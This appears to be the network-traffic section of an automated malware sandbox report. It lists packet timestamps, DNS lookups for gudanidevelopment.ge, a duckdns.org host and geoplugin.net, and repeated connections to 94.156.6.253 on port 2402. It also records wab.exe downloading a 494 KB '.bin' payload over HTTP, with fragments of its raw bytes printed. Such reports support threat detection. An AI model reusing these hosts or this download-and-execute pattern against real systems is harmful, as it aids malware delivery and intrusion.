                                                                                                                                                                                                                  Oct 26, 2023 14:28:53.000849009 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:53.000899076 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:53.000926971 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:53.001018047 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:53.001044035 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:53.001044035 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:53.001195908 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:53.001213074 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:53.001324892 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:53.001384020 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:53.001444101 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:53.001460075 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:53.001463890 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:53.001492977 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:53.001564026 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:53.001612902 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:53.001621962 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:53.001679897 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:53.001698971 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:53.001746893 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:53.001797915 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:53.001920938 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:53.001940012 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:53.001940966 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:53.001996994 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:53.002051115 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:53.002070904 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:53.002121925 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:53.002175093 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:53.002295971 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:53.002373934 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:53.002427101 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:53.002437115 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:53.002504110 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:53.002557039 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:53.002564907 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:53.002623081 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:53.002675056 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:53.002707958 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:53.002760887 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:53.002799034 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:53.002979994 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:53.003079891 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:53.003110886 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:53.003137112 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:53.003155947 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:53.003174067 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:53.003253937 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:53.003292084 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:53.003303051 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:53.003309965 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:53.003424883 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:53.003474951 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:53.003495932 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:53.003622055 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:53.003631115 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:53.003756046 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:53.003774881 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:53.003871918 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:53.003878117 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:53.003999949 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:53.004008055 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:53.004021883 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:53.004203081 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:54.556329966 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:54.557451963 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:56.974935055 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:56.975056887 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:57.213459969 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:57.213522911 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:57.213649988 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:57.213715076 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:57.213742018 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:57.213830948 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:57.452176094 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:57.452258110 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:57.452306986 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:57.457161903 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:57.457396030 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:29:03.238332987 CEST24025005594.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:29:03.242832899 CEST500552402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:29:03.524553061 CEST24025005594.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:29:34.265093088 CEST24025005594.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:29:34.267484903 CEST500552402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:29:34.555697918 CEST24025005594.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:30:04.920779943 CEST24025005594.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:30:04.922561884 CEST500552402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:30:05.212119102 CEST24025005594.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:30:35.527026892 CEST24025005594.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:30:35.528805017 CEST500552402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:30:35.821644068 CEST24025005594.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:30:36.335377932 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:30:36.335388899 CEST5005780192.168.11.20178.237.33.50
                                                                                                                                                                                                                  Oct 26, 2023 14:30:36.960314989 CEST5005780192.168.11.20178.237.33.50
                                                                                                                                                                                                                  Oct 26, 2023 14:30:37.100872993 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:30:38.194410086 CEST5005780192.168.11.20178.237.33.50
                                                                                                                                                                                                                  Oct 26, 2023 14:30:38.616178989 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:30:40.662610054 CEST5005780192.168.11.20178.237.33.50
                                                                                                                                                                                                                  Oct 26, 2023 14:30:41.646779060 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:30:45.583197117 CEST5005780192.168.11.20178.237.33.50
                                                                                                                                                                                                                  Oct 26, 2023 14:30:47.707937956 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:30:55.425000906 CEST5005780192.168.11.20178.237.33.50
                                                                                                                                                                                                                  Oct 26, 2023 14:30:59.830200911 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:31:06.151568890 CEST24025005594.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:31:06.153207064 CEST500552402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:31:06.430888891 CEST24025005594.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:31:15.108172894 CEST5005780192.168.11.20178.237.33.50
                                                                                                                                                                                                                  Oct 26, 2023 14:31:24.059364080 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:31:37.139636993 CEST24025005594.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:31:37.141819000 CEST500552402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:31:37.430810928 CEST24025005594.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:32:07.665050030 CEST24025005594.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:32:07.668981075 CEST500552402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:32:07.961899996 CEST24025005594.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:32:38.870174885 CEST24025005594.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:32:38.872107029 CEST500552402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:32:39.165306091 CEST24025005594.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:33:09.358988047 CEST24025005594.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:33:09.360394001 CEST500552402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:33:09.649444103 CEST24025005594.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:33:39.968223095 CEST24025005594.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:33:40.003154993 CEST500552402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:33:40.290652037 CEST24025005594.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:34:10.945081949 CEST24025005594.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:34:10.946135044 CEST500552402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:34:11.243419886 CEST24025005594.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:34:41.426404953 CEST24025005594.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:34:41.427474976 CEST500552402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:34:41.727790117 CEST24025005594.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:35:12.486264944 CEST24025005594.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:35:12.487346888 CEST500552402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:35:12.774915934 CEST24025005594.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:35:43.337934017 CEST24025005594.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:35:43.339102983 CEST500552402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:35:43.634130001 CEST24025005594.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:36:13.951186895 CEST24025005594.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:36:13.952172041 CEST500552402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:36:14.243530989 CEST24025005594.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:36:45.071870089 CEST24025005594.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:36:45.072879076 CEST500552402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:36:45.352883101 CEST24025005594.156.6.253192.168.11.20

                                                                                                                                                                                                                  UDP Packets

                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                  Oct 26, 2023 14:28:46.374574900 CEST5942953192.168.11.201.1.1.1
                                                                                                                                                                                                                  Oct 26, 2023 14:28:47.375406981 CEST5942953192.168.11.209.9.9.9
                                                                                                                                                                                                                  Oct 26, 2023 14:28:47.396588087 CEST53594291.1.1.1192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.181014061 CEST53594299.9.9.9192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:50.106173992 CEST5042153192.168.11.201.1.1.1
                                                                                                                                                                                                                  Oct 26, 2023 14:28:50.276218891 CEST53504211.1.1.1192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:51.073072910 CEST6170053192.168.11.201.1.1.1
                                                                                                                                                                                                                  Oct 26, 2023 14:28:51.203661919 CEST53617001.1.1.1192.168.11.20

                                                                                                                                                                                                                  DNS Queries

                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                  Oct 26, 2023 14:28:46.374574900 CEST192.168.11.201.1.1.10xf64Standard query (0)gudanidevelopment.geA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Oct 26, 2023 14:28:47.375406981 CEST192.168.11.209.9.9.90xf64Standard query (0)gudanidevelopment.geA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Oct 26, 2023 14:28:50.106173992 CEST192.168.11.201.1.1.10x3386Standard query (0)ourt2949aslumes9.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Oct 26, 2023 14:28:51.073072910 CEST192.168.11.201.1.1.10x3ef8Standard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                                                                                                                                                                                                  DNS Answers

                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                  Oct 26, 2023 14:28:47.396588087 CEST1.1.1.1192.168.11.200xf64No error (0)gudanidevelopment.ge217.147.225.69A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.181014061 CEST9.9.9.9192.168.11.200xf64No error (0)gudanidevelopment.ge217.147.225.69A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Oct 26, 2023 14:28:50.276218891 CEST1.1.1.1192.168.11.200x3386Name error (3)ourt2949aslumes9.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Oct 26, 2023 14:28:51.203661919 CEST1.1.1.1192.168.11.200x3ef8No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                                                                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                                                                                  • gudanidevelopment.ge
                                                                                                                                                                                                                  • geoplugin.net

                                                                                                                                                                                                                  HTTP Packets

                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                  0192.168.11.2050054217.147.225.6980C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                  Oct 26, 2023 14:28:47.709543943 CEST8OUTGET /IogvoayYhe139.bin HTTP/1.1
                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                  Host: gudanidevelopment.ge
                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.015140057 CEST9INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Date: Thu, 26 Oct 2023 12:28:47 GMT
                                                                                                                                                                                                                  Server: Apache
                                                                                                                                                                                                                  Last-Modified: Thu, 26 Oct 2023 08:16:56 GMT
                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                  Content-Length: 494656
                                                                                                                                                                                                                  Cache-Control: s-maxage=10
                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                  Data Raw: 58 bc 9a 79 03 af 7f af 05 ca 76 8e 7b aa 66 c3 7b 56 3a 03 c8 ff 2a 61 e6 69 58 3a c9 e6 54 f5 ab f0 61 e6 74 59 53 7f c4 22 b6 05 f3 13 de 2b f3 df 32 a6 1d 7c 4f 02 49 39 5d 98 f1 78 4d 31 6a 70 23 2f a7 76 a0 17 65 98 e4 ed 74 81 9b 8f d0 af dd 9a eb 62 67 78 eb 6f d5 6c 87 c1 d6 b4 02 69 2a 73 04 45 b3 35 c5 95 40 72 44 ec 4c 49 a6 ec 5d 73 34 b8 37 e9 a1 88 ae ba 71 be b0 de 83 34 1a 3e 2c c7 69 eb c5 73 c6 bd 21 d5 65 08 5a 98 c8 83 7f 96 84 d7 f5 02 ff ff a9 49 94 fa 3e 18 bb 3f 4c e9 45 a0 c8 7b aa cb 70 7a c8 8a 15 09 5b 14 46 33 81 5f 8f 05 dc 68 7d 0a c8 68 68 42 e2 e3 ca 70 26 3b 0b 4e 49 d2 86 5f 01 b8 4b 72 ef 27 b1 ca 49 02 ef df a0 29 fb 90 60 3f 81 32 52 19 5e 77 4a 55 8e cf ad e0 22 8f a2 6d ce 89 d1 22 1f b5 88 dc 8d ff 42 8f d8 04 b0 d3 e8 13 bc 63 b7 b2 cf 72 e5 8a ac 7c 65 ab 97 c1 a0 64 b4 8f 21 05 52 74 d2 87 f8 94 ad 1f 94 46 3c f5 3a be 76 07 2c 59 c2 1a 5d d0 86 83 d6 8d 97 bd 98 f6 ff bc 29 c3 99 9d 1d 31 31 ea 9a c9 21 2f 7c 0a b9 40 5d b6 13 fe 06 4d 06 46 df 34 46 5f 02 db 3c 19 8b ee e0 41 50 bf c9 aa 41 04 40 33 e1 23 bb f9 d7 85 5c 9c 6f 28 26 f9 30 0d e2 ca 65 58 df 25 51 32 0d 34 33 7c 80 6e 89 46 d6 39 ea 7f 59 cb 4d 46 cc 87 c2 32 70 21 bf 10 9c fa 1c d4 5f 90 32 9e fa fd c4 02 07 36 bf a3 e0 aa 29 79 57 0b cf b6 fd 2b e4 6e 8f d6 9e 6e 07 f6 44 90 7f 2f 3c ee 3e 41 ca 5a 41 b4 b7 dc 61 56 8f 54 e3 a8 a6 9c 9a dc 0a 66 66 49 af 18 61 34 87 a5 00 cd f3 73 40 dd 9b 13 11 73 4b f2 17 23 bf 78 d4 f5 6b 18 6d 4f 7d 4e 9e e3 3e dc 0d a8 32 84 6d d8 98 05 25 a4 58 55 83 b9 61 5f 67 86 55 59 ed fa 80 62 86 36 b3 71 6c 02 00 d1 78 42 0a 59 55 74 3e fd 19 98 5f 44 be d3 51 c6 e2 5f e0 69 34 a7 96 11 10 01 e9 b1 1a 78 b3 f8 02 36 3b 5f 20 80 44 af 0f 9a 3c c0 94 27 91 93 1e 15 ed 77 50 d4 90 79 e8 13 96 cd a1 32 72 51 7b bb b2 5c b3 b6 f8 df e9 6e 11 7b dc 3e 4e 39 ad 4f e4 21 0c 1e e5 37 64 95 ff bc 49 eb 98 aa e5 07 31 58 98 c0 76 61 36 17 69 54 21 73 84 ce 14 3d 3a e0 ac 76 8b 98 4f 3b 60 e8 c1 bc 5e c3 11 6b 04 16 69 27 bd 31 43 97 e7 a2 17 c2 d9 db 79 0c b9 d5 9b 49 4a 32 83 80 77 b0 a1 dd 73 3d 02 14 c4 89 c9 52 1e 4c 92 70 3d d5 50 bd ea 79 cc 5a 19 05 89 ee c0 b2 ca fe a1 d7 dc dc 1c f4 d4 79 ac a8 9b cc f0 51 51 e4 3d 2b 8d 04 e3 ac 83 1e f8 77 9c 3f f8 5f 34 d2 82 2a e2 08 b8 b0 e0 88 4d 42 48 0b 26 69 94 ee 87 f5 f3 bc c4 8e 6b 34 5f 27 b6 d4 fd 49 9c 9c e8 33 25 e7 ba 57 e4 c6 83 bb 03 6c 67 07 1c 7d 63 63 ce 3a ac 24 83 99 ed db 79 8d fb c5 6b f2 e5 4c 60 43 0c 55 56 0c 93 96 ac 0b ea 37 01 cf 22 5f ef c0 b4 85 25 3c 27 10 19 35 c0 32 f0 1a 08 28 17 71 76 be 81 2c 0b 04 b2 f9 55 18 e2 7d 9a 9b a0 3f 7b eb ad 83 d5 30 b9 cf a9 6f 03 ec 5c 2a a9 e4 af e5 41 cf 36 c9 53 36 cb a4 e6 64 dc de 76 0f 0d ae 30 2c 6b 21 14 96 2c 8c 82 78 eb 51 b3 3c ab cb 14 e5 08 14 6c f5 ac 61 82 54 48 bf f5 d7 4c 4e 21 19 9d 21 bd 17 0d 11 80 e9 fd 89 d8 80 77 a0 ae 08 44 a0 6e a4 c8 3a c2 6d ab 7a 48 e0 48 46 2a 8a 2f fa b2 e9 20 a0 5d 96 2f 23 fa df cb 07 83 93 0e ce 6e 33 73 47 30 7b 76 0c 7a 5f 24 42 90 84 32 08 5e 36 d3 63 7b 38 e8 a5 ce d5 cc c6 de f9 ab e1 58 14 e3 c2 40 c2 03 6e 56 18 f1 4c a5 63 22 83 0c 36 d8 2f 97 03 29 d5 b6 a0 b0 13 6e 03 2e c1 aa ff ec 9a 4e 8c 4b 53 ed 26
                                                                                                                                                                                                                  Data Ascii: Xyv{f{V:*aiX:TatYS"+2|OI9]xM1jp#/vetbgxoli*sE5@rDLI]s47q4>,is!eZI>?LE{pz[F3_h}hhBp&;NI_Kr'I)`?2R^wJU"m"Bcr|ed!RtF<:v,Y])11!/|@]MF4F_<APA@3#\o(&0eX%Q243|nF9YMF2p!_26)yW+nnD/<>AZAaVTffIa4s@sK#xkmO}N>2m%XUa_gUYb6qlxBYUt>_DQ_i4x6;_ D<'wPy2rQ{\n{>N9O!7dI1Xva6iT!s=:vO;`^ki'1CyIJ2ws=RLp=PyZyQQ=+w?_4*MBH&ik4_'I3%Wlg}cc:$ykL`CUV7"_%<'52(qv,U}?{0o\*A6S6dv0,k!,xQ<laTHLN!!wDn:mzHHF*/ ]/#n3sG0{vz_$B2^6c{8X@nVLc"6/)n.NKS&
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.015237093 CEST10INData Raw: 66 ae eb 59 4a ae a6 0b c8 e5 25 6c 01 5c b6 b4 b9 c5 30 10 4f 66 1a e6 84 cd c9 64 04 7e 68 d6 37 22 e2 ee 16 5d 77 1c 22 b5 2b 54 42 c3 ee 1a 1c cc db fc 1e 91 93 e9 53 1e 52 29 57 a0 10 57 ea d9 9f cf 0c 58 c3 46 c0 e7 cf 11 ec ba cf ca 98 e0
                                                                                                                                                                                                                  Data Ascii: fYJ%l\0Ofd~h7"]w"+TBSR)WWXFSXyb4MZq>0+ye$sE#149QYUEo9&0(nWI_z)v2#_2D<2L@ai9h2<}{$0a"_R:1q:+
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.015315056 CEST12INData Raw: d5 2c 18 85 9d 47 4d 26 b0 ad 5c 08 7b dc 48 64 db 98 5c e6 cc c5 d5 c6 b9 89 9f 56 85 55 00 2e 92 27 e2 17 e5 5d c5 45 01 00 88 c3 f9 bd d9 50 74 d6 55 28 9b 5f 1d 7d 6a 81 e7 a5 cf 0d 91 f4 a0 96 79 ab 81 ac b1 f2 ea 82 fb 02 6f f8 93 ec 4c 88
                                                                                                                                                                                                                  Data Ascii: ,GM&\{Hd\VU.']EPtU(_}jyoLcVX]_+(P)^VV]_1<*U_=iR;-j[=\||+,p)6!k3k*PU(,x6uS$)SNy*pI>M$$va8A""o_<X/
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.015440941 CEST13INData Raw: f4 53 a9 bf a8 2e b4 60 17 2d 48 59 92 f8 bf 94 2d 3d ec 3f ee 65 8b 8c 07 55 ed af 5b 90 ea 80 47 85 31 f5 b6 99 5e b1 cb 20 5f 77 e6 66 81 2f af 76 91 86 4d fc b4 44 25 2c b3 35 90 30 e9 80 eb 84 05 03 4f 26 48 af f7 ca d0 54 0c 2e 02 25 af c9
                                                                                                                                                                                                                  Data Ascii: S.`-HY-=?eU[G1^ _wf/vMD%,50O&HT.%F6{8CxM)1d|[m9^PrAxR)Z!QG/0vn7h`<Cl45#h}]sP4`1&3<(bpbL9,Kc/i
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.015559912 CEST14INData Raw: 1c 34 f9 6a 6c d1 16 f1 ac 20 0c aa c3 86 2e f9 bb 54 21 04 24 1e fb 48 8c 9b 89 6d 5b 21 d0 3d d9 c5 00 60 57 ce df 8a 6e 63 79 81 7d 32 7a 02 6f 97 f6 c2 32 b5 e7 03 cd 7b b6 51 c2 9e 80 6b 94 92 46 fc f3 94 ce b8 7e 91 94 50 9e c1 9e 26 7b 5c
                                                                                                                                                                                                                  Data Ascii: 4jl .T!$Hm[!=`Wncy}2zo2{QkF~P&{\b'<>[Tbwu}>r!1{anvE%-8Skx(zGVzRb!^5d!xfTRa23`1&zG>]`1}[Z0pBw}vo|)<{d0{<
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.015677929 CEST16INData Raw: 6d e1 10 05 15 f7 db eb 49 1e f4 fc 9e 07 94 4f 3b 39 b8 d4 54 5d 71 c0 f0 e6 a6 04 ac be ba b9 8a b7 5d 63 f6 ca 33 8b ff 46 2a 10 71 a4 4d 80 80 77 ed fa 56 bd d5 58 17 c4 89 76 26 3a 80 37 ca 96 a6 5f bd ea 79 2d 4d 1c 05 89 c0 05 ba ca 14 e1
                                                                                                                                                                                                                  Data Ascii: mIO;9T]q]c3F*qMwVXv&:7_y-M"/'Ys+o5 WlNsw[1f}>_ejE3u013|ffUk\((khas}-$_8b{qv;*9?ox"
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.015793085 CEST17INData Raw: ac d4 4c d0 9d 46 d3 04 ea 57 0c df 72 81 64 04 a7 50 ed cc 03 fb 64 78 ab 84 e7 ec fb e5 c6 b4 76 76 a9 8d 14 36 a9 be 0a 7d 53 8b bb 13 c7 86 2d ec 66 83 3b fa f1 b9 cb 89 46 29 83 40 4f 35 81 ae 56 45 26 25 eb e9 0c db c7 f1 ec 71 c7 3f 3c 7e
                                                                                                                                                                                                                  Data Ascii: LFWrdPdxvv6}S-f;F)@O5VE&%q?<~(M crqyn1dEIdb#qN#~51^_*\iX&9knJBP\%a`g+ESRs`AoDQi<LY$(mmrVPX=U
